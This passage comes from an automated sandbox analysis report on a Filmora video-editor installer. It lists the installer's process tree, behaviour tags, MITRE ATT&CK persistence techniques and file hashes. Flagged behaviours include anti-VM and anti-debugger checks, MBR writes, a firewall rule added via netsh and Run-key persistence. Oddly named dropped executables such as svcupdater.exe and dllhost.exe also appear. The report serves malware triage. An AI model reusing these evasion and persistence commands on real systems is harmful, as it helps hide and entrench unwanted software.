- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- NTFS ADS
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\filmora_setup_full846.exe"C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\filmora_setup_full846.exe"2⤵
- Executes dropped EXE
- Modifies Control Panel
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exeC:\Users\Public\Documents\Wondershare\NFWCHK.exe3⤵
- Executes dropped EXE
-
C:\Users\Public\Documents\Wondershare\filmora_64bit_full846.exe"C:\Users\Public\Documents\Wondershare\filmora_64bit_full846.exe" /VERYSILENT /NOPAGE /LANG=ENG /LOG="C:\Users\Admin\AppData\Local\Temp\WAE-Wondershare Filmora.log" /installpath: "C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\" /DIR="C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\" /WAEWIN=2036E3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-9SPNL.tmp\filmora_64bit_full846.tmp"C:\Users\Admin\AppData\Local\Temp\is-9SPNL.tmp\filmora_64bit_full846.tmp" /SL5="$703BE,502339677,421888,C:\Users\Public\Documents\Wondershare\filmora_64bit_full846.exe" /VERYSILENT /NOPAGE /LANG=ENG /LOG="C:\Users\Admin\AppData\Local\Temp\WAE-Wondershare Filmora.log" /installpath: "C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\" /DIR="C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\" /WAEWIN=2036E4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM Wondershare Filmora9.exe5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM Wondershare Filmora X.exe5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM Wondershare Filmora 11.exe5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM Wondershare Filmora.exe5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM EffectsInstaller.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM FCreatorAcademy.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM CheckGraphicsType.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM FilmoraExportEngine.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM ImageHost.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM FRecorder.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM Wondershare Screen Recorder.exe5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM Filmora Core UX Service.exe5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM Wondershare Filmora Update(x64).exe5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM FilmStockService.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM CreatorAcademy.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM ScreenRecorder.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM AlgorithmRunTest.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM AudioPlayer.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM bspatch.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM CefViewWing.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM cmdCheckATI.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM cmdCheckHEVC.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM coremediaserver.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM CrashReporter.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM DataReporting.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM DownloadCenter.exe5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM Filmora.exe5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM FilmoraNPS.exe5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM FilmoraPlayer.exe5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM gpu_check.exe5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM magic_xe_supported_detect.exe5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM MessageService.exe5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM ocl_check.exe5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM ofx_check.exe5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM perf_check.exe5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM RenewService.exe5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM senseTimeGlDetect.exe5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM SupportService.exe5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\TASKKILL.exe"C:\Windows\system32\TASKKILL.exe" /F /IM WebBrowser.exe5⤵
- Kills process with taskkill
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Environment]::GetFolderPath('MyDocuments') | Out-File "C:\Users\Public\Documents\B30281EA-BA02-4586-86F8-C9BE813884C1.txt" -Encoding UTF85⤵
-
C:\Users\Admin\AppData\Local\Temp\is-17HHF.tmp\_isetup\_setup64.tmphelper 105 0x7C5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s atimpenc.dll5⤵
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s atixcode.dll5⤵
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s CFDecode64.ax5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-17HHF.tmp\Wondershare Helper Compact.exe"C:\Users\Admin\AppData\Local\Temp\is-17HHF.tmp\Wondershare Helper Compact.exe" /VERYSILENT /SP-5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-I8BJ8.tmp\Wondershare Helper Compact.tmp"C:\Users\Admin\AppData\Local\Temp\is-I8BJ8.tmp\Wondershare Helper Compact.tmp" /SL5="$30432,2101212,54272,C:\Users\Admin\AppData\Local\Temp\is-17HHF.tmp\Wondershare Helper Compact.exe" /VERYSILENT /SP-6⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe"C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe" /regserver7⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-17HHF.tmp\vcredist_x64.exe"C:\Users\Admin\AppData\Local\Temp\is-17HHF.tmp\vcredist_x64.exe" /q5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
\??\c:\aa8616e4e254b41bdd1a96\install.exec:\aa8616e4e254b41bdd1a96\.\install.exe /q6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\Wondershare NativePush.exe"C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\Wondershare NativePush.exe" /VERYSILENT /BINDINSTALL5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-CNTR9.tmp\Wondershare NativePush.tmp"C:\Users\Admin\AppData\Local\Temp\is-CNTR9.tmp\Wondershare NativePush.tmp" /SL5="$40462,2940891,938496,C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\Wondershare NativePush.exe" /VERYSILENT /BINDINSTALL6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-FNGCH.tmp\_isetup\_setup64.tmphelper 105 0x3E87⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\netsh.exe"netsh.exe" advfirewall firewall add rule name="WsToastNotification" dir=in security=authnoencap action=allow program="C:\Users\Admin\AppData\Local\Wondershare\Wondershare NativePush\WsToastNotification.exe"7⤵
- Modifies Windows Firewall
-
C:\Users\Admin\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe"C:\Users\Admin\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe" start7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe"C:\Users\Admin\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe" install7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe" C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\Wondershare Filmora Launcher.exe3⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" http://cbs.wondershare.com/go.php?m=ic&back_url=https%3A%2F%2Ffilmora.wondershare.com%2Fthankyou%2Finstall-filmora-video-editor.html%3Futm_source%3Dbutton%26utm_medium%3Dproduct-win&client_sign={c086e61f-2c18-4a3f-a2b1-1bf8de41e537G}&m_nProductID=846&installtime=1675125252&product_version=12.0.12.14503⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xe8,0xec,0xf0,0xc4,0xf4,0x7ff9c4774f50,0x7ff9c4774f60,0x7ff9c4774f704⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1548,14392373515788521600,4346509287387515421,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1940 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1548,14392373515788521600,4346509287387515421,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1560 /prefetch:24⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1548,14392373515788521600,4346509287387515421,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2440 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,14392373515788521600,4346509287387515421,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2432 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,14392373515788521600,4346509287387515421,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2424 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1548,14392373515788521600,4346509287387515421,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4216 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,14392373515788521600,4346509287387515421,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4344 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,14392373515788521600,4346509287387515421,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,14392373515788521600,4346509287387515421,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4720 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,14392373515788521600,4346509287387515421,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4520 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1548,14392373515788521600,4346509287387515421,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2804 /prefetch:84⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exeC:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe"C:\Users\Admin\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe"1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Wondershare\Wondershare NativePush\WsToastNotification.exe"C:\Users\Admin\AppData\Local\Wondershare\Wondershare NativePush\WsToastNotification.exe"2⤵
- Executes dropped EXE
- Registers COM server for autorun
- Loads dropped DLL
- Modifies registry class
-
C:\ProgramData\Dllhost\dllhost.exeC:\ProgramData\Dllhost\dllhost.exe1⤵
- Executes dropped EXE
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\Wondershare Filmora Launcher.exe"C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\Wondershare Filmora Launcher.exe"2⤵
- Executes dropped EXE
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\Wondershare Filmora.exe3⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\Wondershare Filmora.exe"C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\Wondershare Filmora.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: AddClipboardFormatListener
-
C:\Windows\System32\Wbem\wmic.exewmic diskdrive where index=1 get serialnumber3⤵
-
C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\AlgorithmRunTest.exe.\AlgorithmRunTest.exe ./ .\resources\ 03⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\AlgorithmRunTest.exe.\AlgorithmRunTest.exe ./ .\resources\ 13⤵
-
C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\magic_xe_supported_detect.exe.\magic_xe_supported_detect.exe 2 ./resources/wfx_effect/material/models/model_data.json wondershare3⤵
-
C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\FilmoraPlayer.exe"C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\FilmoraPlayer.exe" check3⤵
-
C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\ocl_check.exe"C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\ocl_check.exe" --blacklist "C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\opencl_black_list.xml" --whitelist "C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\opencl_white_list.xml" --gpu 0 --result "C:/Users/Admin/Documents\Wondershare/Wondershare Filmora\GPUConfig"\ --recheck 03⤵
-
C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\ocl_check.exe"C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\ocl_check.exe" --blacklist "C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\opencl_black_list.xml" --whitelist "C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\opencl_white_list.xml" --gpu 1 --result "C:/Users/Admin/Documents\Wondershare/Wondershare Filmora\GPUConfig"\ --recheck 03⤵
-
C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\ocl_check.exe"C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\ocl_check.exe" --blacklist "C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\opencl_black_list.xml" --whitelist "C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\opencl_white_list.xml" --gpu 2 --result "C:/Users/Admin/Documents\Wondershare/Wondershare Filmora\GPUConfig"\ --recheck 03⤵
-
C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\DataReporting.exe"C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\DataReporting.exe" WondershareFilmora3⤵
-
C:\Windows\System32\Wbem\wmic.exewmic diskdrive where index=1 get serialnumber3⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4141⤵
-
C:\PROGRA~2\COMMON~1\WONDER~1\WONDER~1\WSHelper.exeC:\PROGRA~2\COMMON~1\WONDER~1\WONDER~1\WSHelper.exe -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Change Default File Association
1Modify Existing Service
1Registry Run Keys / Startup Folder
2Bootkit
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\WinRAR\Rar.txtFilesize
109KB
MD5e8943094a7a6e3a6767e8d412fdbc8c3
SHA17e7eac16f0741a747639a131cf8e93e63c7e9d7c
SHA25635c7deb1cf472f4d695ab0def305234629440236a8e9422fa8860c362ffe35bd
SHA512dda86c6f7ad30bf7dfb7d2d8584f0956018b7425837129d6c9de3c126a9ec48bda8b761bd6084031f0daaa22393af901820a9f2cce1a049944db27705da1209b
-
C:\Program Files\WinRAR\Uninstall.exeFilesize
437KB
MD54b666387a3c9dcff1a35f928003906f8
SHA1afdcb15eb059fa09acc0f0ac7745a5c9b6325cf6
SHA256882dc7d4df95d06de571b475f50472639d62298b7da2bb78cd35f462d815fe92
SHA51260c26cea6eff640b116e98f8e8a6d6de00e6fe6cc379768574c5a8e1df95a6cf6bf37e2f56d040cca537a3406e2af05888a63c5b167ca25b16518808c3a5574e
-
C:\Program Files\WinRAR\WhatsNew.txtFilesize
102KB
MD5009a59803c14130cfb6ef5b1fc8b2bce
SHA11842d01ecd0bfaf5db6c89d17458ba9cac8d0cf1
SHA25686491ffa4415b525dd4f51f3806b5217c5fdbaeee83ac313e28ed342bde83ff5
SHA512a67aa1d6ccfce38314d488fa20469b05f84cf5cb5bdd089b7c28349b64bc359954fccfea7eb574eb3eeb7eec4b6d7f07f334c6be96d14ea301b7706d168ed3d3
-
C:\Program Files\WinRAR\WinRAR.chmFilesize
317KB
MD579f52d2a3c76f7402de3e30b2dc9bc7e
SHA1bb15a3289e308295891b3078190e8d797a52acf2
SHA2564e4db98a555a3821e911bc35c301fd4dab8530cf9fede6f6c9439e212919abda
SHA51273b09d5db6ca8587ec8f5b7a0bd711a9225561116d90ae7609442bd388110eebb075a5862bb1abae54f8c32cb880e27d741dbecdba2cb9b2c10c5ef7b1a2685b
-
C:\Program Files\WinRAR\WinRAR.exeFilesize
2.4MB
MD5f01b85893ccecbb9020d065e47e046aa
SHA1237311f4c143f74758a8ef6aeeeff0b9dcfe1434
SHA256821588b7db1e9a4ddcf4a53435334370e57cd4663a6f4f2aa570e5850432ca42
SHA5125f821880075570b6f1fa5bdf231d46b4e64dd44e2b122cd7c6ef6ed007e9bf23e33e1abef6eef1ef3a9eb63940bc8eb63cc0daa5a2e85062dbb4f2292d59c835
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.datFilesize
40B
MD57813407c23c86944dcb6198cd05110c1
SHA15cd0ce8b526f820df7110425432ac5d4ef674051
SHA256c3cae4b8b257fa124145a9d1f97c64716eba9eb7916bb46e788e606324613306
SHA5126055e7cc9f8249da378339221565e5c6779a7330a82e61e001b3b4ef6f9381eda43ad478ca61fbd7be9392a8d24a55bd83c961a4c8d9a1cc6b1094706e905acd
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\FaviconsFilesize
24KB
MD5f9ada17ad0c764caab65380c502cde2f
SHA1d34148b6975396a933bf25ac432ca1f5c0657545
SHA2563f298af4d4d1d82e998d277a8672cdc64f98d8a58ec985796777c4be5abce032
SHA512b73e1881318d5a59ee9c0a8427dcc34e34c473e83e37b491ed9dd443c69df8beb3f24af7cac8150973a7d6af3bbba604560c87d351eb2943df8199a55483bb8c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\HistoryFilesize
116KB
MD57f3de7442dc7635c26ff3f20404a3e7e
SHA1d80483a21d30f84cb3feaec60136178b5dd9747d
SHA256a0c6c55e92fb13e320da64b944b4e5bc30f0062d5ff6e5bdd3918b82663c9328
SHA512e6e76728a518cfb29b4ef33700777f7aa304670355fd4798be6fecc246497fd783bdccc338cbc42bf2bfd744d4214fb2d9ee8d4495f8413abbdf44e86f194ed5
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
5KB
MD56a864cf4c6317375ffec46144f9939eb
SHA1659acde2142d9c9e65e3b56b4b0d0cf3d5578f80
SHA256f7c7870f444ab048c191e42a940799ce316d13b9c892270bdd249fae8ad110ee
SHA512fd7b5364c2d6d3a38340bcf3f88a3c9cf9f5f9e6dfb214a220e0ca87bb3fc8a2d393eb12360d0c8169b437cc093bcc112e96987b49365b93b71f548ab605e4bc
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesFilesize
17KB
MD5cf5b59cf8230f4ec3c8d3c8803b0ad44
SHA1ba6b4709b0c29814bb3c319559e5fecd8ad68a5c
SHA2565f5b50478e0b5b024899c2c91ffb438597d5c46794569f6b8bd32cb1b9cc0e6a
SHA512935ea0a0d40a08db11ad7ac5004624653983134efa94f09dc33092b2e5796b01a35b4acae386234c8ec2d31e59f736960f49b5d0cda2bc63bc9e5d11d1194d48
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000003.logFilesize
112B
MD5d12e266700c631cee7f32ca308ef7113
